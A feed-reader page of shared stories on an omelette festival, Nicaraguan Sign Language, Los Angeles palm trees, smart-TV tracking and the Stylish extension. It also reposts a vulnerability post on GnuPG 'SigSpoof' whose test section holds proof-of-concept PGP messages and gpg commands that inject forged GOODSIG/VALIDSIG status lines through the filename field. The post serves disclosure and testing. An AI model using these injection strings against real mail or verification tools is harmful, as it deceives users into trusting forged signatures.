security research, software archaeology, geek of all trades
378 stories
·
7 followers

Giant Omelette Festival

1 Share

Members of the Giant Omelette Brotherhood stir more than 15,000 eggs on March 28, 2016, on the main square of Bessieres, France.

Every Easter, the Brotherhood of the Giant Omelette gathers, as they have for decades, in Bessières, France, to crack more than 15,000 eggs, cook a giant omelette, and distribute portions to thousands of observers who flock to the festivities. 

According to a foundational story, Napoleon Bonaparte, while visiting the area, enjoyed his eggs so much that he asked that a giant omelette be prepared for his troops. So now, each Easter, the cooks don chef's whites and toques. Wielding enormous wooden spoons that look more like oars, they stir the eggs in a massive pan over an open fire in the town square. The multi-day festival invariably includes dancing, music, or parades, but the omelette-making is the main event. 

The organization, which is also known as the Knights of the Giant Omelette, takes their mission seriously: "to prepare and serve, free of charge and full of joy, a giant omelette.” The first event, in the '70s, used a few thousand eggs. It's not only grown in egg count, but leapt borders: Local chapters cook giant omelettes in six other cities, from neighboring Fréjus, France, to Pigüé, Argentina. 

Read the whole story
zwol
5 days ago
reply
Pittsburgh, PA
Share this story
Delete

How Deaf Children in Nicaragua Created a New Language

1 Share
article-image

Of all the changes within Nicaragua to come out of the overthrow of the Somoza regime by the Sandinistas in 1979, perhaps the least anticipated was the birth of a new language. Nicaraguan Sign Language is the only language spontaneously created, without the influence of other languages, to have been recorded from its birth. And though it came out of a period of civil strife, it was not political actors but deaf children who created the language’s unique vocabulary, grammar, and syntax.

When the Sandinista National Liberation Front gained power, they embarked on what has been described as a “literacy crusade,” developing programs to promote fluency in reading Spanish. One such initiative was opening the first public school for deaf education, the Melania Morales Special Education Center, in Managua’s Barrio San Judas. According to Ann Senghas, a professor of psychology at Barnard College who has studied NSL, it was the first time in the history of the country that deaf children were brought together in large numbers.

These children, who ranged in age from four to 16, had no experience with sign language beyond the “home signs” they used with family members to communicate broad concepts. American Sign Language, which has existed since the early 19th century, is used throughout the Americas and is often considered a “lingua franca” among deaf people whose first sign language is a national or regional one. But the first Nicaraguan deaf school did not use ASL or any signs at all. Instead, they focused on teaching children to speak and lip-read Spanish.

article-image

This educational strategy, known as “oralism,” has long been a subject of debate in deaf education, one that was particularly fierce in the United States where ASL originated. Around the turn of the 20th century, some deaf-education advocates believed that the ability to speak and lip-read a language would be more beneficial to deaf individuals than “manualism,” communication via sign language. By learning English, they argued, deaf individuals would be able to fully participate in U.S. society.

English immersion for the deaf was part of a wider effort, epitomized by the eugenics movement, to stamp out differences within the American population. Among the most vocal proponents of eugenics when it came to the deaf community was the inventor of the telephone, Alexander Graham Bell. Bell argued that if deaf people were allowed to communicate via sign language, their isolation from the hearing population would lead to more deaf marriages and, consequently, a larger deaf population.

“Oralism, Bell believed, allowed deaf people to leave their educational and cultural corners and participate in society at large,” writes Brian H. Greenwald, professor of history at the deaf institution Gallaudet University, via email. Bell, Greenwald notes, “used oralism as a form of assimilation.” It was a strategy that Bell hoped would eventually lead to the eradication of deafness in American society.

In Managua in the 1980s, too, though free of the influence of eugenicists, the Sandinistas focus on Spanish literacy resulted in the immersion of deaf students in Spanish speaking and reading skills. But while the country’s deaf children were being taught Spanish inside the classroom, outside the classroom they were spontaneously developing their own method of signed communication.

Though older and younger students attended separate classes during school hours, on buses and playgrounds the children quickly began to select “conventions” for necessary words. Such conventions occur when a community of speakers, who at home may have all used different signs to refer to an object or action, begin to consistently default to using just one, says James Shepard-Kegl. Kegl is co-director of the Nicaraguan Sign Language Project, which administers programs to empower the Nicaraguan deaf community through the use of sign language. “You start building a vocabulary this way,” he says.

article-image

All languages have grammar and syntax, but the first children at Managua’s deaf school had no model for how a language worked because they had been isolated from signed, spoken, and written language all their lives, Shepard-Kegl notes. When the children interacted, instead of adapting their signs to fit an existing language, they developed something unique. While the older students had more life experience, it was actually the younger kids that drove the language’s development. “As you get older, your language instincts tend to diminish,” says Shepard-Kegl. “A lot of those older kids weren’t generating grammar the way little kids did. They copied the grammar the little kids generated.”

No one knows exactly how many individuals are needed to generate a new language or what percentage of those individuals need to be young children. Smaller-scale isolated deaf-education programs had existed previously in 20th-century Nicaragua, Shepard-Kegl says, but the critical mass needed to spontaneously develop Nicaraguan Sign Language only occurred with the opening of Melania Morales. Within a few years, teachers and education officials recognized that something incredible was happening at the school and, in 1986, Nicaragua’s Ministry of Education invited the U.S. linguist Judy Kegl to visit as a deaf-education consultant.

article-image

For Kegl and the other linguists that accompanied her after the initial visit, the opportunity to identify and study Nicaraguan Sign Language was “extremely rare,” writes Senghas in her 1995 MIT doctoral dissertation, Children’s Contribution to the Birth of Nicaraguan Sign Language, which focuses on the years she spent working with Kegl. (Kegl is today co-director of the Nicaraguan Sign Language Project and married to Shepard-Kegl.) It’s an opportunity that owes much to the birth of NSL occuring in the 1980s, when researchers had access to video cameras and could accurately record exactly what was happening. “To my knowledge,” Senghas writes, “there has not been another case of linguists and psycholinguists documenting the birth of a language on a community-wide scale.”

This is not to say, however, that other independent community-based sign languages never existed. In fact, the linguistic world is rich with a wide variety of mutually unintelligible signed languages. Though American Sign Language and some other widely utilized sign languages, such as Chinese Sign Language and Indo-Pakistani Sign Language, have long histories, they were often inaccessible to deaf families and institutions in rural, mountainous, or politically-charged regions. In order to communicate manually, these communities had to develop their own signed languages. For example, in early-to-mid-20th century Jim Crow-era Raleigh, North Carolina, under-resourced and pedagogically isolated African-American deaf schools independently developed unique languages, says Susan Burch, an American Studies professor at Middlebury College. It’s something that has occurred many times in history.

Nicaraguan Sign Language similarly developed in a vacuum. Whereas American Sign Language could have extended into Nicaragua by the 1980s, as it did in neighboring Costa Rica where it combined with a locally developed sign language in the 1960s, Nicaragua’s geo-political isolation prevented ASL from entering the country, notes Shepard-Kegl. Not only did this allow for the independent creation of Nicaraguan Sign Language, but it helped the nascent form of communication to survive.

article-image

Around the world, deaf sign languages, including the one spoken among African Americans in Raleigh, have disappeared or changed significantly when a more widely used language has entered the region. Linguists refer to this displacement as “linguistic imperialism.”

It is a concept that has generated considerable controversy. Some linguists feel that the “contamination” of a local language by a more globally dominant one results in the marginalization of a native community because it supplants the indigenous form of communication with something from outside. Others believe that when dominant languages arrive, they are appropriated by indigenous communities, often combining with an existing language to create a distinctly local version. Deaf Costa Ricans born prior to the 1960s, for example, primarily use what is referred to as Old Costa Rican Sign Language. When ASL arrived in the country after the 1960s, its appropriation by the deaf community resulted in the creation of New Costa Rican Sign Language (sometimes called Modern Costa Rican Sign Language), around 60 percent of which is made up of ASL signs.

In Nicaragua today, changes in technology and communication have led to the increased use of American Sign Language within the deaf community. While ASL has not replaced the pristine, isolated NSL of the 1980s, which still dominates deaf education there, Nicaraguan Sign Language has begun a natural process of integrating elements of ASL. “Languages, by nature, borrow,” says Shepard-Kegl. “They either borrow or they perish.”

For all that linguists have learned from the study of Nicaraguan Sign Language, perhaps most important is the proof it has provided for a controversial theory of language. In the 1960s, Noam Chomsky suggested that children are born with an innate ability to learn human language. Babies are not given grammar lessons and yet they reliably learn grammar because they have inherent expectations about how languages function, says Shepard-Kegl. Kids “don’t know what the [grammatical] rule is but [they] expect that there is a rule.” In Managua’s first deaf school, there was no model and no one to guide the children in sign language and still a language was created in a way never observed before.

Read the whole story
zwol
37 days ago
reply
Pittsburgh, PA
Share this story
Delete

Why Are There Palm Trees in Los Angeles?

1 Share

Let’s go back in time, to Los Angeles in 1875. Here’s what you see: basically nothing. The town—and “town” is even sort of grand for what it was—has about 8,000 people in it. But here’s something weirder: there are no palm trees. As a matter of fact, there aren’t really any trees at all. This area is just sort of a scrubland desert.

Over the next 50 years, palm trees would become a major transformative force in the development of Los Angeles. This is despite the fact that they don’t really do anything. The trees of urban Los Angeles do not provide shade or fruit or wood. They are lousy at preventing erosion. What they do, and what they did, is stranger: they became symbols.

article-image

There is a single species of palm native to the entire state of California, the California fan palm, which is a big one with what looks like a fuzzy beard of brown leaves underneath its green fronds. It’s naturally found around desert oases in the Colorado Desert. (The Colorado Desert is not in Colorado, but is named for the river. Joshua Tree National Park is there.) The native people of that area, the Cahuilla, used it pretty liberally; palm fronds are incredibly strong and heavy, which makes them good for building. But compared with the East Coast palms—there are 12 species native to Florida—the West Coast was, until very recently, basically barren of these trees. Plants. Tall grass things. Wait, what are palms, exactly?

One first weird thing in a very long list of weird things about palms is that they are not really trees. The word “tree” is not a horticultural term—it’s sort of like “vegetable,” in that you can kind of call anything a vegetable—but palms are not at all like the other plants commonly referred to as trees. They don’t have wood, for one thing; the interior of a palm is made up of basically thousands of fibrous straws, which gives them the tensile strength to bend with hard tropical windstorms without snapping. They are monocots, which is a category of plant in which the seed contains only one embryonic leaf; as monocots, they have more in common with grasses like corn and bamboo than they do with an oak or pine tree.

Southern California might not have been rich with trees, but it was rich with money and rich with sunshine. Once the railroads came to Los Angeles, in the 1880s, speculators realized this huge empty sunny place would be a great opportunity to sell land. But how to get people to move way out to the desert? One way was incredibly cheap train tickets; the railroads sold tickets from the Midwest for as little as one dollar. But, as with California ever since, the place had to be marketed.

article-image

There are only two palm species native to Europe; one is a little shrub, and the other is restricted to a few Mediterranean islands. Because they were not common, palms have for centuries had a strange pull for people who didn’t grow up around them. “In the Western imagination, palms for a very very long time were associated with that part of the world that, depending on your point of view and your time in history could be called the Orient, or the Far East, or the Middle East, or the Levant, or the Holy Land, or the Ottoman world, or the Turkish world,” says Jared Farmer, the author of the definitive book on California foliage, Trees in Paradise.

Palms grow freely in the Middle East, and this part of the world always had major religious associations for Westerners, most of whom, for a long time, followed Christianity, Judaism, or Islam—all of which have their holiest sites there. Palms themselves are used in those religions: Jews use them during Sukkot for waving rituals, Christians during Palm Sunday often folded into crosses. The Prophet Mohammed talks about date palms a lot, even if the plant doesn’t have as prominent a role in the rituals of Islam.

The original reason that palms were planted in the New World was for use during Palm Sunday; Catholic missionaries in Florida and California, finding themselves in a place with a hospitable climate for palms, planted them around their missions. But the missionaries are not responsible for the mass of palms in Los Angeles.

article-image

Up until the mid- to late-19th century, the French Riviera was sparsely populated. But popular writers began traveling there, and found it was pretty nice. That, coupled with a trendy new health fad in which time in a dry warm climate is supposed to have good effects on the body, increased its popularity. Immediately developers moved there and began building it up. Palms, already a symbol of warmth from the Middle East, were ideal for this kind of rapid development.

Remember how palms aren’t like other trees? One way is that they’re outrageously easy to move around: they don’t have elaborate root systems like oak trees, but instead a dense yet small root ball. This can be pretty easily dug up and transported, then planted, and palms are not particular about where they are, as long as they have sun and water. To make things easier for developers, palms, being more like grasses than trees, don’t demonstrate all that much difference between individuals; one Mexican fan palm is pretty much like the next. And if you’re a developer, consistency and ease of transportation is a fantastic combination: you can line the streets with them, or plant one on each side of an entrance! And it’s cheap and easy and looks festive. Plus, it has this preexisting association in the minds of your customers (who, in the case of the early French Riviera, were mostly British) with warmth and exoticism.

Palms, though they weren’t native to the Riviera, became indelibly associated with it. And the American developers eyeing Southern California got some ideas. Hey, they thought. This big chunk of desert-y scrubland we own is not that dissimilar from the Mediterranean sites of the Riviera. What if we took a page from their book, and started branding Los Angeles?

article-image

Los Angeles, for what it’s worth, wasn’t the only place to try copying the French Riviera. The British tried it too, in a place called Torbay, although even in the far south of England it’s just not warm enough for palms to really thrive. They did their best, though, with a palm called the New Zealand cabbage palm, planted all over the area. It’s basically a shrub.

Anyway, palms took off as a symbol of wealth, luxury, nice weather, vacation. The ease of growing them in containers meant that palms were found on luxury ships like the Titanic and Lusitania. Robber barons, fancy hotels, and magnates in San Francisco—a much older city than Los Angeles—planted them in “palm courts,” a sort of atrium/ballroom featuring lots of palms and probably a string quartet.

“What LA adds to that, which no city, no people had ever thought to do before, and maybe for good reason, is to plant palms systematically as street trees,” says Farmer. The young city, wanting to attract people to a world of sunshine and cars, planted tens of thousands of palm trees. And they weren’t just on big boulevards: Los Angeles planted them everywhere. Tiny residential streets, parks, anywhere. Places designed for tourists—boardwalks, beaches, wealthy hills, even sports arenas like Staples Center, where the Lakers and Clippers basketball teams play—were especially tended to. And they made sure the palms were watered.

article-image

Palm trees were the only non-natives that the early planners of Los Angeles planted. They also planted lots of citrus trees, pepper trees, and eucalyptus, all of which were supposed to evoke this Mediterranean feel. But it was the palms that really took off.

This experiment yielded some very strange results. The palms thrived in Los Angeles—Farmer described seeing them growing in cracks in the asphalt in abandoned lots—and one species in particular, the Mexican fan palm, grew enormous. The Mexican fan palm is native to Northern Mexico; it’s that incredibly tall skinny one with the little fronds high up above. “Nobody knew they would grow so tall; they grow taller in LA than they would in the wild. They're the tallest palms in the history of the world, at least that we know of,” says Farmer.

They are, in fact, taller than most buildings in Los Angeles. The city has always been a sprawling, low-slung city, with few buildings over two stories tall. It spread horizontally rather than vertically, partially due to the cheap abundant land and partially because Los Angeles was always an automotive city. Unlike in other cities, the great skyscrapers of Los Angeles are not huge buildings: they’re trees.

article-image

Once the palms were firmly ensconced in Los Angeles, the movie and TV industry popularized them. The palms, despite not being native to LA and in fact only having recently arrived there, became the most iconic image of the city. Every awards show, every red carpet, every movie and show shot in Southern California included palm trees. The city expanded like crazy; the population went from 11,000 in 1880 to over 1.2 million only 50 years later.

Urban trees do actually have jobs, besides just looking nice: they provide shade, reduce heat, clean the air, some prevent erosion, and some produce an edible or useful material. Palms in Los Angeles do not do any of this. Their job was not to be good urban trees; it was to create an image of a new kind of city and convince people from elsewhere to come to Los Angeles. They succeeded at that! But with the first batch of trees now dying out due to old age and an array of pests and diseases, Los Angeles is making some changes. Replacement palms are more likely to be more drought-tolerant and provide more shade, like the Chilean palm. But, says Farmer, Los Angeles is not likely to ever let palms completely vanish.

Read the whole story
zwol
43 days ago
reply
Pittsburgh, PA
Share this story
Delete

Smart TVs in Millions of U.S. Homes Track Everything Users Watch

1 Comment and 3 Shares

Sapna Maheshwari, New York Times:

Still, David Kitchen, a software engineer in London, said he was startled to learn how Samba TV worked after encountering its opt-in screen during a software update on his Sony Bravia set.

The opt-in read: “Interact with your favorite shows. Get recommendations based on the content you love. Connect your devices for exclusive content and special offers. By cleverly recognizing onscreen content, Samba Interactive TV lets you engage with your TV in a whole new way.”

[…]

“The thing that really struck me was this seems like quite an enormous ask for what seems like a silly, trivial feature,” Mr. Kitchen said. “You appear to opt into a discovery-recommendation service, but what you’re really opting into is pervasive monitoring on your TV.”

[…]

Jeffrey Chester, executive director of the Center for Digital Democracy, said few people review the fine print in their zeal to set up new televisions. He said the notice should also describe Samba TV’s “device map,” which matches TV content to mobile gadgets, according to a document on its website, and can help the company track users “in their office, in line at the food truck and on the road as they travel.”

Do people truly want to be tracked for advertising purposes by nearly every device that they interact with? Survey after survey for years has indicated that they do not, yet we seem to have shrinking opportunities to object to it. Nearly every TV you’ll find at an electronics store today is a smart TV, and many of them have some form of this kind of tracking built in. The number of ways we’re being tracked on the web has exploded, and the number of companies that trade and collect that information in bulk keeps going up.

This is all buried in multi-thousand-word privacy policies that are not reasonable for the average user to read and interpret correctly. This is one reason I’m so supportive of GDPR — even though it doesn’t adequately regulate behavioural data collection, it does at least require full disclosure of privacy-intrusive practices to allow users more control the sharing of their data.

Technology companies are increasingly not operating in users’ best interests because users have few options besides disconnecting entirely.

Maheshwari, continued:

The Times is among the websites that allow advertisers to use data from Samba to track if people who see their ads visit their websites, but a Times spokeswoman, Eileen Murphy, said that the company did that “simply as a matter of convenience for our clients” and that it was not an endorsement of Samba TV’s technology.

As I wrote in April, website administrators have a responsibility to their users — and, in the Times’ case especially, their paying subscribers — to be careful with their website’s third-party data collection and sharing practices. Their agreement with Samba is an implicit endorsement that advertisers can target their users with data collected in an ethically-dubious manner.

Read the whole story
zwol
43 days ago
reply
I’m really not looking forward to the inevitable day when I have to replace my nice reliable dumb TV, purchased 2008. It only ever gets used as a computer monitor so maybe I can just buy a computer monitor.
Pittsburgh, PA
MotherHydra
43 days ago
I hope monitors get big enough. I still haven't seen black levels on par with Panasonic's plasma sets.
acdha
43 days ago
reply
Washington, DC
Share this story
Delete

Pretty Bad {Protocol,People}

1 Share

tl;dr: This vulnerability affects GnuPG and several plugins and wrapper libraries, including Vinay Sajip’s “python-gnupg” which I rewrote many years ago after finding a shell injection vulnerability in his code. His code is vulnerable to SigSpoof; mine isn’t.

Markus Brinkmann, a NeoPG developer, wrote about a recent signature spoofing vulnerability in GnuPG which carried over into several downstream plugins and wrapper libraries—largely due to GnuPG’s interface design which uses file descriptors, and only file descriptors, to speak a custom, potentially binary but often ascii, order dependent line protocol, whose line order, keywords, number of fields, and other details are subject to change between minor point versions of GnuPG. If that sounds like a special hell invented by some sort of unholy crossing between RMS and a rabid howler monkey: welcome to working with (or rather, more likely, around) the Terrible Idea Generator known as the GnuPG development team.

As previously mentioned, while working with Riseup¹ folks on a project, we found a shell injection vulnerability in Vinay Sajip’s python-gnupg module (the one that installs if you do pip install python-gnupg; mine installs with pip install gnupg). The fix was not merely to remove shell=True argument passed to a call to subprocess.Popen() as Vinay believed (and continues to believe)—but instead, to sanitise all inputs and whitelist available options. There are hundreds of flags to the gnupg binary. Some flags and options are safe. Others can be, if you carefully sanitise their arguments. Others must be disallowed entirely.

My python-gnupg module isn’t vulnerable to SigSpoof, for several reasons:

  1. --no-options is passed by default. So if you’ve got something stupid in your gpg.conf file, you’ll still be fine while using my Python module.

  2. --verbose is not passed. This means that my library doesn’t have to wade throught a mixture of strange stderr and GnuPG status-fd messages on the same file descriptor. You could pass --verbose to it manually, as it is in the list of allowable, whitelisted options, but the exploit still won’t work, which brings us to our next point:

  3. All inputs to, and outputs from, the gnupg binary are sanitised and then forced to conform to whitelists. This means that, even if you did pass --verbose manually, the filename trick won’t work because there’s no way to safely sanitise a filename, because filenames may be arbitrary bytes.

Amusingly, the front page of Vinay’s current documentation states:


Which beautifully demonstrates that Vinay still doesn’t understand the original bug report. Additionally, not a single line of his original code remains unchanged, as the bulk of it was badly written and contained hidden landmines.

At the time I pointed out the vulnerability, Vinay argued that it wasn’t a bug until a working exploit for a Bitcoin exchange C&C server, which was unfortunately running his code, was released. Vinay released several versions of his library at the time, without making the version controlled repo available, meaning that for each new version he claimed to have “fixed the bug”, I had to diff the tarballs to discover, unsurprisingly, that he had, in fact, not.

I find it difficult to convey how thoroughly unimpressed I am with men like Vinay. I volunteered the work, handed him an explanation and a solution, and was ridiculed, told I was wrong, that I didn’t understand, and ignored. He’s still never credited me by name anywhere for finding the original bug. Men like this make me want to go write closed source code that none of you will ever see, just so that I never have to deal with these GNU/Beardos ever again. Have fun with the bugs, Vinay, they’ll certainly keep coming.

Test it yourself

Here is a script which will print the status-fd output of GnuPG and test a spoofed signature (PoC #1), a spoofed signature plus a falsely encrypted (i.e. appears to have been encrypted to the user, when in fact no encryption was used) message (PoC #2), and an additional method for signature spoofing (PoC #3):

    #!/usr/bin/env python
    #
    # Test whether python-gnupg (https://github.com/isislovecruft/python-gnupg),
    # is vulnerable to SigSpoof.
    #
    # Authors: isis agora lovecruft 

    from __future__ import print_function

    import gnupg

    # Set the gnupg log level to `--debug-level=guru` (lmao).
    log = gnupg._logger.create_logger(9)
    log.setLevel(9)

    # Create our gpg instance
    gpg = gnupg.GPG(binary="/usr/bin/gpg2")

    poc1msg = '''\
    -----BEGIN PGP MESSAGE-----

    hQIMAwxKj89n7yVcARAAkhbztv+rjtUZx4rSqpvlj8a9g+y+8ZOY8JhBFvJzVAXe
    tnBNDGmIAc9I9ewRgxwsgcCIlUuGYCSgFugWLYVPD+e0tyQwx76mpMZc5wqAMows
    mk2pavdYMD2FGePY9mCVDvpC8ldumVn2dgT0k2IIOVr8w29CRgzP8ONwAyFFr4Gw
    hZ82e+CLKMFOv7Aigp00D1esurNTzFN5MDJZqhQtPpXawexUjrl5GEsPtKLDkKyt
    iOR5HauLLlDPZJXhHqwrqbSKTpKJU9lztmFp3XVom6VgeCiHWcL0mYF2fcbzfJS/
    CjDFZqFmFPGUJSpdgDcGEGsalzk6o8RFtUvvmKtQLN9BglpYkyPXQiO8vCyS4xiN
    D0gjBxVSvvkdS7734FYxePkUDEOTQbPuJ+FzgMN6Jpp8hVopYbefVcU5bNIY4H2P
    9EAHgvX1AT+VtPPt0JxzQ5/UdXK5KE7O7zUtTJIkXd4hGFpWyZp8hTUEgqLHfHUw
    Qlso2hQ+xgqok1ruGRjYk7n48Uw89jYpBXCOJerZeQGrmGWEkuf1vonFVwddM/4p
    msPN9I6Ahf+Uth+U5rFO4Y2G5fk83saa6ZfM9qdZKgLLEOgXmyycAdSAq/vRRe1G
    z9W77qcuIdhi2dA6+CJBqkm97aYNvoQ4Mxt97e7nP5WijXwugumdMQ7oT1upIsbS
    wFQBov2rvuwWsqrw+kbPD+zedi0NP31BohjiEhBamohGkkh8gr4hPmiyJdm0TIfh
    GBo5z35kRQiJZ9DwmgxE+LnVWQvChEJt0NFuC5FqM5bBaOjR5b2QsYn5uZ5AnVTa
    OZj5HBaaZQqZod5FrGpVpmXG2+RThge8dCbx+CDdBWvLq99TppzcN5nGEHYaz41X
    1ZKRcpbUuixBn3juC6HN2iQq9BidAbpVWvTAYD4dH+/aio3fd+3wSCgHQnPRzxg9
    5YaF6XbFYO8ceruOmnzYYEQTBRmlrBbnaug/cDa5Yq4HIWDHRTR9/aK4Y9rcYsoK
    Jm+7ujLey3TsI9qMs3cbcmsZbnXm+v3uDLvGBofG/dAjqVvm074=
    =UN+a
    -----END PGP MESSAGE-----
    '''

    result1 = gpg.verify(poc1msg)
    print("[poc1] Was the spoofed signature valid? %r" % result1.valid)

    poc2msg = '''\
    -----BEGIN PGP MESSAGE-----

    y8BvYv8nCltHTlVQRzpdIEdPT0RTSUcgRjJBRDg1QUMxRTQyQjM2OCBQYXRyaWNr
    IEJydW5zY2h3aWcgPHBhdHJpY2tAZW5pZ21haWwubmV0PgpbR05VUEc6XSBWQUxJ
    RFNJRyBGMkFEODVBQzFFNDJCMzY4IHggMTUyNzcyMTAzNyAwIDQgMCAxIDEwIDAx
    CltHTlVQRzpdIFRSVVNUX0ZVTExZCltHTlVQRzpdIEJFR0lOX0RFQ1JZUFRJT04K
    W0dOVVBHOl0gREVDUllQVElPTl9PS0FZCltHTlVQRzpdIEVOQ19UTyBBM0FEQjY3
    QTJDREI4QjM1IDEgMApncGc6ICdbIaFeU2VlIHlvdSBhdCB0aGUgc2VjcmV0IHNw
    b3QgdG9tb3Jyb3cgMTBhbS4K
    =Qs3t
    -----END PGP MESSAGE-----
    '''

    result2 = gpg.decrypt(poc2msg)
    print("[poc2] Was the spoofed signature and encryption valid? %r"
          % result2.valid)

    poc3msg = '''\
    -----BEGIN PGP MESSAGE-----

    owJ42m2PsWrDMBiE9zzF1Uu2YDmJZYcQasV2oLRLHegQOij4txC1rGBZQ1+lT9M9
    79O5gkAppceNd8d318/H85dxaj5TF7VBo9UgJz8SjGwJR09gCR78gCRmGWK2CU7W
    KJ6wr5rjrfRH3ulB4bkp8EbvYDFfVnxViWUmyrRk+Yqne1FnVZGXos5rwVNWpJz/
    O6Wd8zQiOuu+v6euW9hRRbfkwdoW7ge3G61B9BJyWhoI3waGyQ7Y/q7uIpw63/ev
    mIfLp7vrhyGaYAhyCqDSzL4B9fBP7w==
    =zQV0
    -----END PGP MESSAGE-----
    '''

    result3 = gpg.verify(poc3msg)
    print("[poc3] Was the spoofed signature valid? %r" % result3.valid)

The GnuPG blobs were generated with (via Markus Brinkmann’s suggestions):

## PoC #1
echo 'Please send me one of those expensive washing machines.' | \
gpg --armor -r a3adb67a2cdb8b35 --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

## PoC #2
echo "See you at the secret spot tomorrow 10am." | \
gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

# PoC #3
echo 'meet me at 10am' | gpg --armor --store --set-filename "`echo -ne msg\''\
\ngpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST\
\ngpg:                using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677\
\ngpg:                issuer "bill@eff.org"\
\ngpg: Good signature from "William Budington <bill@eff.org>" [full]
'\''msg'`" > poc3.msg

Again, not vulnerable, for all the reasons described above.

Additionally, if Vinay would have actually understood and fixed the root cause of the original shell injection vulnerability six years ago, his library likely wouldn’t be vulnerable, yet again, today. But of course, the GnuPG community, just like upstream, really only takes patches from men, so it’s neither my problem nor concern that they seem to continually discover new and innovative ways to fuck themselves and their users over.

Please don’t

If you’re a developer thinking of making a new tool or product based on the OpenPGP protocol: please don’t. Literally use anything else. I wrote my version of python-gnupg because, at the time, the project I worked on wanted to make transparently encrypting remailers, i.e. middleware boxes run by an email service provider which users register their encryption keys with, which would—upon seeing a plaintext email to another of the provider’s users—automatically encrypt the email to the user. We used GnuPG for this. This was a mistake, in my opinion, and if I had to do the project again, I would do it entirely differently.

If you’re a developer thinking you can write a less shitty version of GnuPG: please don’t. RFC4880 was a mistake and needs to die in a fire. Also nobody under thirty actually uses email for anything other than signing up for services.

If you’re a user or potential user of GnuPG: please don’t. Try using tools with safer, constant-time cryptographic implementations, better code, nicer and more inclusive development teams, and a better overall user experience, like Signal.

If you’re considering getting into GnuPG development: please don’t. Especially if you’re non-cis-male identified, it’s going to be a complete and infuriating waste of your time and talents. Please consider donating your skills to more inclusive projects with fewer moronic assholes.

Moving forward

There isn’t really any path forward. GnuPG and its underlying libgcrypt remain some of the worst C code I’ve ever read. The code isn’t constant time, and numerous attacks have resulted from this, as the developers scurry to jump through hoops of fire to implement yet another variable-timed algorithm they’ve seemingly come up with on the spot which is vulnerable to a dozen more attacks just not that one from the latest paper. OpenPGP (RFC4480) is one of the worst designs and specifications ever written. I have to spend spots, here and there, of my non-existent free time maintaining a whitelist as the GnuPG developers randomly change their internal, nearly undocumented line protocol, between micro versions. I’d like to not do this. Please, let’s stop pretending this crock of shit provides anything at all “pretty good”: not the cryptographic algorithms, not the code, not the user experience, and certainly not the goddamned IPC design.

There is one way forward: Vinay is annoyed that my library has a similar name, because god forbid a user get tricked into using something more secure. Frankly, I’m sick of Vinay’s trash code being mistaken for mine, and increasingly so, the more vulnerabilities surface in it. So I’ve decided to rename the thing formerly installable with pip install gnupg to pip install pretty_bad_protocol (name thanks to boatspbp rust crate). If you grep for pretty_bad_protocol in a python library which uses gnupg and there’s no results, you’ll know someone’s not being very honest about what gnupg has to offer.


¹ I don’t speak for my current or past employers or clients.

Read the whole story
zwol
44 days ago
reply
Pittsburgh, PA
Share this story
Delete

i’ve seen a lot of posts about it on mastodon but not over here, soif you use the ‘Stylish’ browser...

1 Share

i’ve seen a lot of posts about it on mastodon but not over here, so

if you use the ‘Stylish’ browser extension to make websites not look like shit, you need to backup your themes, uninstall it, install Stylus instead, and import your themes into that

stylish got bought by a company that turned it into spyware

stylus works in exactly the same way, and with all the same themes, without spying on you

uninstall stylish

Read the whole story
zwol
46 days ago
reply
Pittsburgh, PA
Share this story
Delete
Next Page of Stories